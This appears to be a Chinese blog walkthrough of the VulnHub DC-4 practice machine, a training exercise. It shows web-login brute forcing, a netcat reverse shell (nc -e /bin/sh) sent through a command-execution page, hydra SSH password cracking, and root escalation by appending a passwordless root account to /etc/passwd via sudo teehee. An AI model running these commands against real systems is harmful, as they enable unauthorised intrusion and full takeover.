vulnhub dc4 靶场实战

发表于 更新于 分类于 阅读次数: Valine: 本文字数: 885 阅读时长 ≈ 2 分钟

靶场地址:https://download.vulnhub.com/dc/DC-4.zip

判断靶场的ip

image-20220326160944719

确认IP为:192.168.123.233

扫一扫后台地址

image-20220326163340492

扫一下是什么web

image-20220326163418228

扫描端口、服务等

image-20220326161407444

80端口,访问走一走

发现了admin信息登录系统

image-20220326162113450

那既然是admin,那不得走一波密码爆破

按照长度排个序,660这个,就是它了

有时候也可以根据status来判断,但是也有例外

如果登录成功后,它的长度和状态码都还是一样的情况下,可能是登录成功后就跳转了,所以这种情况下怎么在这么多的请求中发现爆破成功的那种,大伙有啥其他思路分享一下!嘿嘿嘿

image-20220325221005279

账号:admin 密码:happy (这里不区分大小写,我试过了,一般登录验证页面也不会做大小写区分)

发现可以执行命令啊,burpsuite抓个包

image-20220326162630043

抓个包,发送到repeater,再写个nc反弹shell(如果不成功,记得对空格进行编码)

1
nc –e /bin/sh 192.168.123.233 4444

image-20220326162810952

发包之前记得用nc侦听4444端口

1
nc -vlp 4444

image-20220326162955497

成功拿到网站权限

然后在jim用户下发现了backups文件夹

然后在backups下发现了一个old-password.bak旧密码备份文件

cat查看一波

image-20220326163219876

把这些密码保存起来,用hydra爆破一下jim用户ssh密码

1
hydra -l jim -P pass.txt ssh://192.168.123.233 -vV -t 64

我这个线程开得比较大64个,真实情况下一般开小点

这个pass.txt里保存的就是刚刚那个旧密码备份文件中的密码

爆破成功,密码为jibril04

image-20220326163651787

登录jim用户看看有什么

发现了一封邮件,不过没什么可用信息,但是既然有邮件,就要去系统的邮件服务文件夹去看看

image-20220326163811325

在var/mail中又看到了charles用户给jim用户发的邮件,里面还有charles用户的密码

image-20220326163939879

看看能不能拿到root目录下的flag,很明显事情没那么简单

image-20220326164109317

接下来开始提权

image-20220326164151175

发现用 teehee可以运行root权限的命令,那就创建一个root权限的用户,不设置密码

1
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd    #添加admin用户

image-20220326164324098

切换用户,查看flag

image-20220326164349280

总结:

  1. 用户文件夹里有邮件,就可能出现过收发邮件操作,所以去系统存放邮件的文件夹里查看一番是很有必要的,蛛丝马迹
  2. 利用teehee命令添加一个拥有root权限的用户,且使用root权限添加用户还不用输入密码(利用root无密码执行)